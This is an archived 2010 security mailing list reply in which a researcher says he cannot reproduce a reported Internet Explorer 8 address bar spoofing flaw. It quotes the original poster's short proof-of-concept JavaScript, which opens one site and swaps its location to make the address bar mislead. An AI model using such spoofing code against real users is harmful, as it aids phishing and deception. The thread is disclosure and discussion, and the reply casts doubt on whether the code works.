[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: Internet Explorer 8.0 Address Bar Spoofing Vulnerability

To: info@xxxxxxxxxxxxxx
Subject: Re: Internet Explorer 8.0 Address Bar Spoofing Vulnerability
From: Shreyas Zare <shreyas@xxxxxxxxxxxx>
Date: Mon, 26 Jul 2010 22:00:34 +0530

cant replicate it on my test setup. is something missing?

Shreyas Zare

Sr. Information Security Researcher
Secfence Technologies
www.secfence.com



On Sat, Jul 24, 2010 at 4:38 PM,  <info@xxxxxxxxxxxxxx> wrote:
> Spoof Code:
>
> <script>
> function Spoof() {
>  oc=window.open('http://www.securitylab.ir/', '','location=1');
>  oc.location.replace('http://www.microsoft.com/');
> }
> </script>
> <p align="center">
> <a href="javascript:void(0);" onClick="Spoof()">Go to the 
> Securitylab.ir</a></p>
>
>
> Discovered by: Pouya Daneshmand
> http://Securitylab.ir/Advisories
>

References:
- Internet Explorer 8.0 Address Bar Spoofing Vulnerability
  - From: info

Prev by Date: [LWSA-2010-001] Likewise Open 5.4 & 6.0
Next by Date: [USN-958-1] Thunderbird vulnerabilities
Previous by thread: Internet Explorer 8.0 Address Bar Spoofing Vulnerability
Next by thread: DM Filemanager (fckeditor) Remote Arbitrary File Upload Exploit
Index(es):
- Date
- Thread